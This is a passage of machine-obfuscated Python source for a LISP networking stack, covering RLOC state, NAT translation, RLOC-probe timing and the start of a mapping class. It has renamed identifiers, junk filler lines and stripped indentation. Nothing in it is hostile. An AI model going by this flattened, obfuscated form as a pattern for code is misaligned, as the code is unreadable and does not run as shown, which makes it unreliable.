if 25 - 25: o0oOOo0O0Ooo + I1ii11iIi11i * oO0o / IiII - Ii1I
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 85 - 85: Oo0Ooo . i11iIiiIii % oO0o
if 60 - 60: OOooOOo
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 14 - 14: oO0o - i11iIiiIii / OoOoOO00 % o0oOOo0O0Ooo / IiII * I1IiiI
if 2 - 2: i1IIi / I1Ii111 + I1IiiI + I1ii11iIi11i - o0oOOo0O0Ooo + iIii1I11I1II1
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 78 - 78: I1ii11iIi11i % i1IIi . I1Ii111 + Oo0Ooo . o0oOOo0O0Ooo % II111iiii
if 65 - 65: Ii1I . OoOoOO00 + O0 / iIii1I11I1II1 % Ii1I % I1Ii111
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 31 - 31: o0oOOo0O0Ooo - Oo0Ooo
if 15 - 15: O0 + OOooOOo
if 8 - 8: i11iIiiIii . IiII . I1ii11iIi11i + i1IIi % I1Ii111
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 64 - 64: I1IiiI . Oo0Ooo * OoO0O00
if 87 - 87: i1IIi / OoooooooOO
def print_rloc ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , i1 , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 68 - 68: I1Ii111 / iIii1I11I1II1
if 8 - 8: ooOoO0o * IiII * OOooOOo / I1IiiI
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
IIiiI11iI = self . rloc_name
if ( cour ) : IIiiI11iI = lisp_print_cour ( IIiiI11iI )
return ( 'rloc-name: {}' . format ( blue ( IIiiI11iI , cour ) ) )
if 40 - 40: i11iIiiIii + OoooooooOO
if 2 - 2: o0oOOo0O0Ooo * OoO0O00
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
Oo0o = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
if 88 - 88: Oo0Ooo + oO0o + iII111i
if 51 - 51: i1IIi + i11iIiiIii * I11i / iII111i + OoooooooOO
if 89 - 89: i11iIiiIii - I1Ii111 - O0 % iIii1I11I1II1 / IiII - O0
if 63 - 63: OOooOOo
I1II = self . rloc
if ( I1II . is_null ( ) == False ) :
IIIii = lisp_get_nat_info ( I1II , self . rloc_name )
if ( IIIii ) :
Oo0o = IIIii . port
o0Oooo = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
oo0o00OO = I1II . print_address_no_iid ( )
O0ooo0Ooo = red ( oo0o00OO , False )
I1111I1ii1I1 = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if 61 - 61: iIii1I11I1II1 / I1Ii111 * OoO0O00 . oO0o
if 29 - 29: Oo0Ooo
if 82 - 82: OoO0O00
if 93 - 93: Oo0Ooo
if 71 - 71: OoooooooOO - IiII . I1ii11iIi11i + OoooooooOO
if 97 - 97: Ii1I - I1IiiI . OoooooooOO * IiII
if ( IIIii . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( O0ooo0Ooo , Oo0o , I1111I1ii1I1 ) )
if 17 - 17: OoO0O00 / II111iiii / II111iiii / II111iiii
if 70 - 70: OoO0O00 + O0 * OoO0O00
IIIii = None if ( IIIii == o0Oooo ) else o0Oooo
if ( IIIii and IIIii . timed_out ( ) ) :
Oo0o = IIIii . port
O0ooo0Ooo = red ( IIIii . address , False )
lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( O0ooo0Ooo , Oo0o ,
# i11iIiiIii * OoooooooOO
I1111I1ii1I1 ) )
IIIii = None
if 47 - 47: OOooOOo + Oo0Ooo * I11i
if 8 - 8: Ii1I % i1IIi
if 29 - 29: oO0o % OoOoOO00 / OoOoOO00
if 79 - 79: IiII % OoooooooOO
if 51 - 51: iII111i . oO0o % ooOoO0o % Ii1I . o0oOOo0O0Ooo
if 43 - 43: II111iiii
if 72 - 72: OoOoOO00 * oO0o - ooOoO0o / iII111i
if ( IIIii ) :
if ( IIIii . address != oo0o00OO ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( O0ooo0Ooo , red ( IIIii . address , False ) ) )
if 8 - 8: OoO0O00 * I1ii11iIi11i
self . rloc . store_address ( IIIii . address )
if 18 - 18: O0 + I1Ii111 . I1ii11iIi11i
O0ooo0Ooo = red ( IIIii . address , False )
Oo0o = IIIii . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( O0ooo0Ooo , Oo0o , I1111I1ii1I1 ) )
if 48 - 48: Ii1I . o0oOOo0O0Ooo * O0 / OoooooooOO + I1Ii111 + Oo0Ooo
self . store_translated_rloc ( I1II , Oo0o )
if 92 - 92: Ii1I - o0oOOo0O0Ooo % I1IiiI + I1Ii111
if 3 - 3: iIii1I11I1II1 + i11iIiiIii
if 49 - 49: OoOoOO00 % iIii1I11I1II1 + I1Ii111
if 38 - 38: i11iIiiIii
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
if 75 - 75: iIii1I11I1II1 / OoO0O00 * OOooOOo % O0
if 82 - 82: Oo0Ooo / i1IIi . i1IIi / oO0o
if 7 - 7: Oo0Ooo . iII111i % I1ii11iIi11i / iII111i
if 93 - 93: iII111i
self . rle = rloc_record . rle
if ( self . rle ) :
for IiioOoo in self . rle . rle_nodes :
IIiiI11iI = IiioOoo . rloc_name
IIIii = lisp_get_nat_info ( IiioOoo . address , IIiiI11iI )
if ( IIIii == None ) : continue
if 5 - 5: iII111i . I11i % I11i * Ii1I - I1ii11iIi11i . i11iIiiIii
Oo0o = IIIii . port
Ooooo = IIiiI11iI
if ( Ooooo ) : Ooooo = blue ( IIiiI11iI , False )
if 32 - 32: II111iiii
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( Oo0o ,
# o0oOOo0O0Ooo * o0oOOo0O0Ooo + OoooooooOO - I1Ii111
IiioOoo . address . print_address_no_iid ( ) , Ooooo ) )
IiioOoo . translated_port = Oo0o
if 83 - 83: iIii1I11I1II1
if 42 - 42: OOooOOo + iII111i . I1Ii111 - IiII / O0
if 62 - 62: IiII * I1ii11iIi11i * iII111i * OoOoOO00
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
if 12 - 12: Oo0Ooo * Ii1I / ooOoO0o % I11i % O0
if 25 - 25: Oo0Ooo * oO0o
if 78 - 78: OoOoOO00 / II111iiii
if 6 - 6: I1Ii111 . OoOoOO00
oO00oo = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if 36 - 36: OoO0O00 . ooOoO0o . O0 / OoO0O00
if ( rloc_record . keys != None and oO00oo ) :
o0Oo = rloc_record . keys [ 1 ]
if ( o0Oo != None ) :
oo0o00OO = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( Oo0o )
if 50 - 50: Ii1I . OoOoOO00 * o0oOOo0O0Ooo
o0Oo . add_key_by_rloc ( oo0o00OO , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( oo0o00OO , False ) ) )
if 68 - 68: IiII * oO0o / OoOoOO00 / I1Ii111
if 72 - 72: I1ii11iIi11i
if 74 - 74: I1Ii111 * iIii1I11I1II1 / oO0o - IiII - I1IiiI
return ( Oo0o )
if 84 - 84: iIii1I11I1II1 % Oo0Ooo / I1ii11iIi11i + o0oOOo0O0Ooo * II111iiii
if 81 - 81: I1IiiI / I1ii11iIi11i / OOooOOo
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
if 89 - 89: Oo0Ooo % IiII
if 36 - 36: IiII % OoOoOO00 % I1ii11iIi11i
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
if 7 - 7: I1ii11iIi11i % OoOoOO00 - O0 . I1Ii111
if 9 - 9: Ii1I . OoooooooOO / ooOoO0o + i1IIi
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
if 90 - 90: oO0o - OoOoOO00 % ooOoO0o
return ( True )
if 83 - 83: OOooOOo - I1ii11iIi11i + OoO0O00
if 99 - 99: iII111i - OoOoOO00 % ooOoO0o
def is_rtr ( self ) :
return ( ( self . priority == 254 and self . mpriority == 255 and self . weight == 0 and self . mweight == 0 ) )
if 27 - 27: oO0o . oO0o * iII111i % iIii1I11I1II1
if 81 - 81: iII111i * II111iiii
if 28 - 28: i11iIiiIii . Oo0Ooo . Ii1I
def print_state_change ( self , new_state ) :
III1I111i = self . print_state ( )
O0ooo = "{} -> {}" . format ( III1I111i , new_state )
if ( new_state == "up" and self . unreach_state ( ) ) :
O0ooo = bold ( O0ooo , False )
if 18 - 18: i1IIi + O0 + o0oOOo0O0Ooo + OoO0O00 / o0oOOo0O0Ooo
return ( O0ooo )
if 8 - 8: i11iIiiIii
if 44 - 44: OoooooooOO - ooOoO0o + I1ii11iIi11i * oO0o
def print_rloc_probe_rtt ( self ) :
if ( self . rloc_probe_rtt == - 1 ) : return ( "none" )
return ( self . rloc_probe_rtt )
if 73 - 73: O0 * I1Ii111 - i1IIi
if 68 - 68: OOooOOo % IiII / Oo0Ooo + OoOoOO00
def print_recent_rloc_probe_rtts ( self ) :
i1I1I1i = str ( self . recent_rloc_probe_rtts )
i1I1I1i = i1I1I1i . replace ( "-1" , "?" )
return ( i1I1I1i )
if 27 - 27: o0oOOo0O0Ooo % IiII + I1IiiI
if 19 - 19: iIii1I11I1II1
def compute_rloc_probe_rtt ( self ) :
IiI1i11iiII = self . rloc_probe_rtt
self . rloc_probe_rtt = - 1
if ( self . last_rloc_probe_reply == None ) : return
if ( self . last_rloc_probe == None ) : return
self . rloc_probe_rtt = self . last_rloc_probe_reply - self . last_rloc_probe
self . rloc_probe_rtt = round ( self . rloc_probe_rtt , 3 )
o0O00OoooOo = self . recent_rloc_probe_rtts
self . recent_rloc_probe_rtts = [ IiI1i11iiII ] + o0O00OoooOo [ 0 : - 1 ]
if 66 - 66: I1Ii111
if 95 - 95: Oo0Ooo
def print_rloc_probe_hops ( self ) :
return ( self . rloc_probe_hops )
if 74 - 74: OoooooooOO * i11iIiiIii * OoO0O00 * o0oOOo0O0Ooo
if 48 - 48: iII111i * I1ii11iIi11i * oO0o % O0 . OoO0O00
def print_recent_rloc_probe_hops ( self ) :
i1I1II1 = str ( self . recent_rloc_probe_hops )
return ( i1I1II1 )
if 64 - 64: OOooOOo
if 36 - 36: i1IIi . I11i % ooOoO0o / IiII * i11iIiiIii
def store_rloc_probe_hops ( self , to_hops , from_ttl ) :
if ( to_hops == 0 ) :
to_hops = "?"
elif ( to_hops < LISP_RLOC_PROBE_TTL / 2 ) :
to_hops = "!"
else :
to_hops = str ( LISP_RLOC_PROBE_TTL - to_hops )
if 38 - 38: i11iIiiIii
if ( from_ttl < LISP_RLOC_PROBE_TTL / 2 ) :
II111IiI1I = "!"
else :
II111IiI1I = str ( LISP_RLOC_PROBE_TTL - from_ttl )
if 8 - 8: OOooOOo . Ii1I
if 15 - 15: ooOoO0o / OOooOOo + i1IIi / Ii1I / OOooOOo
IiI1i11iiII = self . rloc_probe_hops
self . rloc_probe_hops = to_hops + "/" + II111IiI1I
o0O00OoooOo = self . recent_rloc_probe_hops
self . recent_rloc_probe_hops = [ IiI1i11iiII ] + o0O00OoooOo [ 0 : - 1 ]
if 47 - 47: Oo0Ooo + oO0o % OoooooooOO
if 23 - 23: I1Ii111 / i11iIiiIii - ooOoO0o * iII111i - Ii1I . iIii1I11I1II1
def store_rloc_probe_latencies ( self , json_telemetry ) :
i11IIIi1I1I = lisp_decode_telemetry ( json_telemetry )
if 85 - 85: O0 * I1IiiI . Oo0Ooo - IiII
O0iiII1iiiI1II1 = round ( float ( i11IIIi1I1I [ "etr-in" ] ) - float ( i11IIIi1I1I [ "itr-out" ] ) , 3 )
i1111Iii = round ( float ( i11IIIi1I1I [ "itr-in" ] ) - float ( i11IIIi1I1I [ "etr-out" ] ) , 3 )
if 68 - 68: ooOoO0o * OoooooooOO - OoooooooOO
IiI1i11iiII = self . rloc_probe_latency
self . rloc_probe_latency = str ( O0iiII1iiiI1II1 ) + "/" + str ( i1111Iii )
o0O00OoooOo = self . recent_rloc_probe_latencies
self . recent_rloc_probe_latencies = [ IiI1i11iiII ] + o0O00OoooOo [ 0 : - 1 ]
if 59 - 59: Ii1I / I11i / I1Ii111 + IiII * I1ii11iIi11i
if 18 - 18: O0
def print_rloc_probe_latency ( self ) :
return ( self . rloc_probe_latency )
if 60 - 60: II111iiii % O0 - I1Ii111 / iII111i / I1IiiI
if 59 - 59: O0 / iIii1I11I1II1
def print_recent_rloc_probe_latencies ( self ) :
iiIIiI = str ( self . recent_rloc_probe_latencies )
return ( iiIIiI )
if 56 - 56: ooOoO0o
if 94 - 94: OoOoOO00
def process_rloc_probe_reply ( self , ts , nonce , eid , group , hc , ttl , jt ) :
I1II = self
while ( True ) :
if ( I1II . last_rloc_probe_nonce == nonce ) : break
I1II = I1II . next_rloc
if ( I1II == None ) :
lprint ( " No matching nonce state found for nonce 0x{}" . format ( lisp_hex_string ( nonce ) ) )
if 12 - 12: I11i * OoooooooOO + ooOoO0o
return
if 16 - 16: IiII
if 100 - 100: OoO0O00 % Oo0Ooo - OoooooooOO
if 48 - 48: IiII / I11i * OoooooooOO
if 1 - 1: I1ii11iIi11i + I11i
if 54 - 54: IiII * O0 * I1Ii111 + i1IIi - I11i . I11i
if 39 - 39: I1Ii111
I1II . last_rloc_probe_reply = ts
I1II . compute_rloc_probe_rtt ( )
Iiiii = I1II . print_state_change ( "up" )
if ( I1II . state != LISP_RLOC_UP_STATE ) :
lisp_update_rtr_updown ( I1II . rloc , True )
I1II . state = LISP_RLOC_UP_STATE
I1II . last_state_change = lisp_get_timestamp ( )
o0oO0o00 = lisp_map_cache . lookup_cache ( eid , True )
if ( o0oO0o00 ) : lisp_write_ipc_map_cache ( True , o0oO0o00 )
if 21 - 21: i11iIiiIii * I1Ii111 % I11i . oO0o
if 84 - 84: IiII % iII111i
if 79 - 79: O0 / IiII . i1IIi - i1IIi + i1IIi
if 47 - 47: iII111i - I1Ii111 - I1Ii111 . ooOoO0o
if 5 - 5: i1IIi
I1II . store_rloc_probe_hops ( hc , ttl )
if 47 - 47: I11i * I11i . OoOoOO00
if 68 - 68: OoooooooOO + OoOoOO00 + i11iIiiIii
if 89 - 89: Oo0Ooo + Ii1I * O0 - I1Ii111
if 33 - 33: iIii1I11I1II1 . I11i
if ( jt ) : I1II . store_rloc_probe_latencies ( jt )
if 63 - 63: oO0o - iII111i
oO0oo000O = bold ( "RLOC-probe reply" , False )
oo0o00OO = I1II . rloc . print_address_no_iid ( )
I11iiI111iIi1I = bold ( str ( I1II . print_rloc_probe_rtt ( ) ) , False )
IiI1i1i1 = ":{}" . format ( self . translated_port ) if self . translated_port != 0 else ""
if 100 - 100: II111iiii - O0 / oO0o - I11i % OOooOOo + Oo0Ooo
Oo00 = ""
if ( I1II . rloc_next_hop != None ) :
o0 , I1IIIIiI1i = I1II . rloc_next_hop
Oo00 = ", nh {}({})" . format ( I1IIIIiI1i , o0 )
if 45 - 45: OoooooooOO / o0oOOo0O0Ooo / iII111i
if 72 - 72: I1Ii111
III1iIi111I1 = bold ( I1II . print_rloc_probe_latency ( ) , False )
III1iIi111I1 = ", latency {}" . format ( III1iIi111I1 ) if jt else ""
if 94 - 94: ooOoO0o . IiII - Ii1I + I1ii11iIi11i / ooOoO0o
iIIi1iI1I1IIi = green ( lisp_print_eid_tuple ( eid , group ) , False )
if 10 - 10: ooOoO0o . OOooOOo * O0 % II111iiii
lprint ( ( " Received {} from {}{} for {}, {}, rtt {}{}, " + "to-ttl/from-ttl {}{}" ) . format ( oO0oo000O , red ( oo0o00OO , False ) , IiI1i1i1 , iIIi1iI1I1IIi ,
# oO0o
Iiiii , I11iiI111iIi1I , Oo00 , str ( hc ) + "/" + str ( ttl ) , III1iIi111I1 ) )
if 50 - 50: I1IiiI * Oo0Ooo - IiII % i1IIi
if ( I1II . rloc_next_hop == None ) : return
if 3 - 3: IiII + i11iIiiIii * II111iiii + ooOoO0o - ooOoO0o
if 17 - 17: OoO0O00 / I1Ii111
if 47 - 47: I11i . iII111i * OoOoOO00 % OoooooooOO
if 59 - 59: OoooooooOO + I1ii11iIi11i - I11i / I1IiiI * oO0o
I1II = None
O00oo0 = None
while ( True ) :
I1II = self if I1II == None else I1II . next_rloc
if ( I1II == None ) : break
if ( I1II . up_state ( ) == False ) : continue
if ( I1II . rloc_probe_rtt == - 1 ) : continue
if 94 - 94: II111iiii + OoooooooOO . i1IIi + OoO0O00 + OoOoOO00
if ( O00oo0 == None ) : O00oo0 = I1II
if ( I1II . rloc_probe_rtt < O00oo0 . rloc_probe_rtt ) : O00oo0 = I1II
if 52 - 52: iII111i * OoOoOO00
if 80 - 80: I1Ii111 / IiII * o0oOOo0O0Ooo - OoOoOO00 / iIii1I11I1II1
if ( O00oo0 != None ) :
o0 , I1IIIIiI1i = O00oo0 . rloc_next_hop
Oo00 = bold ( "nh {}({})" . format ( I1IIIIiI1i , o0 ) , False )
lprint ( " Install host-route via best {}" . format ( Oo00 ) )
lisp_install_host_route ( oo0o00OO , None , False )
lisp_install_host_route ( oo0o00OO , I1IIIIiI1i , True )
if 38 - 38: II111iiii / I11i + IiII % OoooooooOO
if 27 - 27: OoOoOO00 * OoO0O00 * OOooOOo % I1IiiI * o0oOOo0O0Ooo + I1ii11iIi11i
if 73 - 73: i1IIi
def add_to_rloc_probe_list ( self , eid , group ) :
oo0o00OO = self . rloc . print_address_no_iid ( )
Oo0o = self . translated_port
if ( Oo0o != 0 ) : oo0o00OO += ":" + str ( Oo0o )
if 52 - 52: IiII / i11iIiiIii * O0
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) :
lisp_rloc_probe_list [ oo0o00OO ] = [ ]
if 67 - 67: OOooOOo / I11i - I1Ii111 % i11iIiiIii
if 3 - 3: oO0o + iII111i + OOooOOo
if ( group . is_null ( ) ) : group . instance_id = 0
for I1I111iIiI , iIIi1iI1I1IIi , i11ii in lisp_rloc_probe_list [ oo0o00OO ] :
if ( iIIi1iI1I1IIi . is_exact_match ( eid ) and i11ii . is_exact_match ( group ) ) :
if ( I1I111iIiI == self ) :
if ( lisp_rloc_probe_list [ oo0o00OO ] == [ ] ) :
lisp_rloc_probe_list . pop ( oo0o00OO )
if 54 - 54: i11iIiiIii + OoO0O00 - IiII - iII111i / I11i
return
if 85 - 85: OOooOOo * OOooOOo * I1Ii111 - ooOoO0o . O0 % iII111i
lisp_rloc_probe_list [ oo0o00OO ] . remove ( [ I1I111iIiI , iIIi1iI1I1IIi , i11ii ] )
break
if 5 - 5: i1IIi * iII111i . o0oOOo0O0Ooo - I1ii11iIi11i
if 84 - 84: i1IIi
lisp_rloc_probe_list [ oo0o00OO ] . append ( [ self , eid , group ] )
if 17 - 17: IiII + iII111i * OoO0O00 / iII111i
if 67 - 67: i1IIi * IiII . OoOoOO00 % iIii1I11I1II1 - iIii1I11I1II1 * I1ii11iIi11i
if 96 - 96: iII111i / i11iIiiIii / oO0o + Oo0Ooo
if 65 - 65: OoOoOO00
if 87 - 87: I11i % i1IIi + i11iIiiIii * II111iiii
I1II = lisp_rloc_probe_list [ oo0o00OO ] [ 0 ] [ 0 ]
if ( I1II . state == LISP_RLOC_UNREACH_STATE ) :
self . state = LISP_RLOC_UNREACH_STATE
self . last_state_change = lisp_get_timestamp ( )
if 58 - 58: OoO0O00 * I1IiiI - II111iiii / Ii1I - I1IiiI % OoooooooOO
if 33 - 33: IiII / i1IIi + I1Ii111
if 5 - 5: O0 / iII111i % II111iiii . Oo0Ooo - I11i
def delete_from_rloc_probe_list ( self , eid , group ) :
oo0o00OO = self . rloc . print_address_no_iid ( )
Oo0o = self . translated_port
if ( Oo0o != 0 ) : oo0o00OO += ":" + str ( Oo0o )
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) : return
if 84 - 84: oO0o * iII111i % i11iIiiIii - O0 . iIii1I11I1II1 - OoOoOO00
oOoOOOo = [ ]
for i1ii1i1Ii11 in lisp_rloc_probe_list [ oo0o00OO ] :
if ( i1ii1i1Ii11 [ 0 ] != self ) : continue
if ( i1ii1i1Ii11 [ 1 ] . is_exact_match ( eid ) == False ) : continue
if ( i1ii1i1Ii11 [ 2 ] . is_exact_match ( group ) == False ) : continue
oOoOOOo = i1ii1i1Ii11
break
if 5 - 5: II111iiii
if ( oOoOOOo == [ ] ) : return
if 70 - 70: Ii1I + Oo0Ooo + Oo0Ooo / i1IIi
try :
lisp_rloc_probe_list [ oo0o00OO ] . remove ( oOoOOOo )
if ( lisp_rloc_probe_list [ oo0o00OO ] == [ ] ) :
lisp_rloc_probe_list . pop ( oo0o00OO )
if 33 - 33: OoooooooOO + o0oOOo0O0Ooo . OoOoOO00 % Oo0Ooo * O0
except :
return
if 49 - 49: I1ii11iIi11i * I1Ii111 - OoooooooOO . i1IIi . I1ii11iIi11i
if 37 - 37: IiII - oO0o
if 92 - 92: I1IiiI
def print_rloc_probe_state ( self , trailing_linefeed ) :
oOOO = ""
I1II = self
while ( True ) :
OOOOO0 = I1II . last_rloc_probe
if ( OOOOO0 == None ) : OOOOO0 = 0
o0OOOO = I1II . last_rloc_probe_reply
if ( o0OOOO == None ) : o0OOOO = 0
I11iiI111iIi1I = I1II . print_rloc_probe_rtt ( )
OO0o0OO0 = space ( 4 )
if 92 - 92: II111iiii . O0 . iIii1I11I1II1 % IiII - i11iIiiIii
if ( I1II . rloc_next_hop == None ) :
oOOO += "RLOC-Probing:\n"
else :
o0 , I1IIIIiI1i = I1II . rloc_next_hop
oOOO += "RLOC-Probing for nh {}({}):\n" . format ( I1IIIIiI1i , o0 )
if 9 - 9: OoO0O00
if 60 - 60: O0 / OoOoOO00 % i11iIiiIii % II111iiii / OoooooooOO
oOOO += ( "{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + "received: {}, rtt {}" ) . format ( OO0o0OO0 , lisp_print_elapsed ( OOOOO0 ) ,
# ooOoO0o . OOooOOo * Oo0Ooo - OoOoOO00
OO0o0OO0 , lisp_print_elapsed ( o0OOOO ) , I11iiI111iIi1I )
if 52 - 52: I11i . ooOoO0o
if ( trailing_linefeed ) : oOOO += "\n"
if 15 - 15: I11i
I1II = I1II . next_rloc
if ( I1II == None ) : break
oOOO += "\n"
if 23 - 23: Oo0Ooo - OoO0O00 . II111iiii
return ( oOOO )
if 50 - 50: i1IIi - OOooOOo * OoooooooOO * IiII - I1IiiI % I11i
if 58 - 58: II111iiii
def get_encap_keys ( self ) :
Oo0o = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 97 - 97: II111iiii * o0oOOo0O0Ooo
oo0o00OO = self . rloc . print_address_no_iid ( ) + ":" + Oo0o
if 13 - 13: o0oOOo0O0Ooo . II111iiii
try :
iIi11III = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( iIi11III [ 1 ] ) : return ( iIi11III [ 1 ] . encrypt_key , iIi11III [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 76 - 76: II111iiii + I1Ii111 . OoooooooOO / IiII % i11iIiiIii
if 87 - 87: Ii1I / OoOoOO00 / OOooOOo
if 11 - 11: o0oOOo0O0Ooo * OoO0O00 . o0oOOo0O0Ooo - I1IiiI / IiII - OOooOOo
def rloc_recent_rekey ( self ) :
Oo0o = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 19 - 19: i1IIi + IiII . OoO0O00 / O0 - I1Ii111 - Oo0Ooo
oo0o00OO = self . rloc . print_address_no_iid ( ) + ":" + Oo0o
if 24 - 24: iII111i + i1IIi
try :
o0Oo = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ] [ 1 ]
if ( o0Oo == None ) : return ( False )
if ( o0Oo . last_rekey == None ) : return ( True )
return ( time . time ( ) - o0Oo . last_rekey < 1 )
except :
return ( False )
if 31 - 31: OoOoOO00
if 37 - 37: iIii1I11I1II1 % IiII / i11iIiiIii - oO0o
if 43 - 43: II111iiii - OoooooooOO
if 11 - 11: I1IiiI
class lisp_mapping ( ) :
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
self . map_cache_ttl = None
self . register_ttl = LISP_REGISTER_TTL
self . last_refresh_time = self . uptime
self . source_cache = None
self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
self . recent_sources = { }
self . last_multicast_map_request = 0
if 76 - 76: iII111i - II111iiii % Oo0Ooo . I1Ii111
if 64 - 64: OoO0O00 - OoO0O00
def print_mapping ( self , eid_indent , rloc_indent ) :
i1 = lisp_print_elapsed ( self . uptime )
OOo0oOOO0 = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
if 93 - 93: Oo0Ooo . O0
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , OOo0oOOO0 , i1 ,
len ( self . rloc_set ) ) )
for I1II in self . rloc_set : I1II . print_rloc ( rloc_indent )
if 75 - 75: iII111i * II111iiii - I1IiiI
if 30 - 30: i1IIi / ooOoO0o . ooOoO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 22 - 22: I11i % iIii1I11I1II1 - i11iIiiIii * OoOoOO00 - I1Ii111
if 97 - 97: i11iIiiIii . OoOoOO00 + oO0o * O0 % OoO0O00 - Ii1I
def print_ttl ( self ) :
Oo0o0 = self . map_cache_ttl
if ( Oo0o0 == None ) : return ( "forever" )
if 46 - 46: I1Ii111
if ( Oo0o0 >= 3600 ) :
if ( ( Oo0o0 % 3600 ) == 0 ) :
Oo0o0 = str ( Oo0o0 / 3600 ) + " hours"
else :
Oo0o0 = str ( Oo0o0 * 60 ) + " mins"
if 87 - 87: o0oOOo0O0Ooo - iII111i * OoO0O00 * o0oOOo0O0Ooo . o0oOOo0O0Ooo / OOooOOo
elif ( Oo0o0 >= 60 ) :
if ( ( Oo0o0 % 60 ) == 0 ) :
Oo0o0 = str ( Oo0o0 / 60 ) + " mins"
else :
Oo0o0 = str ( Oo0o0 ) + " secs"
if 50 - 50: i11iIiiIii - II111iiii * OoooooooOO + II111iiii - ooOoO0o
else :
Oo0o0 = str ( Oo0o0 ) + " secs"
if 52 - 52: i1IIi + i1IIi * i1IIi / OoOoOO00
return ( Oo0o0 )
if 98 - 98: iII111i . i1IIi + o0oOOo0O0Ooo * OoooooooOO - i11iIiiIii
if 21 - 21: i11iIiiIii . oO0o * o0oOOo0O0Ooo + Oo0Ooo * OoOoOO00 * o0oOOo0O0Ooo
def refresh ( self ) :
if ( self . group . is_null ( ) ) : return ( self . refresh_unicast ( ) )
return ( self . refresh_multicast ( ) )
if 33 - 33: I1IiiI + O0 - I11i
if 90 - 90: I1Ii111 * OoooooooOO . iIii1I11I1II1 % OoO0O00 / I11i + iII111i
def refresh_unicast ( self ) :
return ( self . is_active ( ) and self . has_ttl_elapsed ( ) and
self . gleaned == False )
if 63 - 63: o0oOOo0O0Ooo . IiII . Oo0Ooo - iIii1I11I1II1 / I1Ii111
if 66 - 66: ooOoO0o * I1Ii111 - II111iiii
def refresh_multicast ( self ) :
if 38 - 38: O0 % I1ii11iIi11i + O0
if 37 - 37: Oo0Ooo / I1IiiI
if 23 - 23: II111iiii / iII111i
if 55 - 55: i11iIiiIii - Ii1I % OoooooooOO * OoooooooOO
if 92 - 92: iIii1I11I1II1
Ooo0o0oo0 = int ( ( time . time ( ) - self . uptime ) % self . map_cache_ttl )
II1II1 = ( Ooo0o0oo0 in [ 0 , 1 , 2 ] )
if ( II1II1 == False ) : return ( False )
if 48 - 48: O0 / I1IiiI % II111iiii
if 10 - 10: Ii1I / I1Ii111 / O0 - II111iiii % IiII - ooOoO0o
if 48 - 48: OOooOOo * OoOoOO00 / oO0o + II111iiii - I1ii11iIi11i
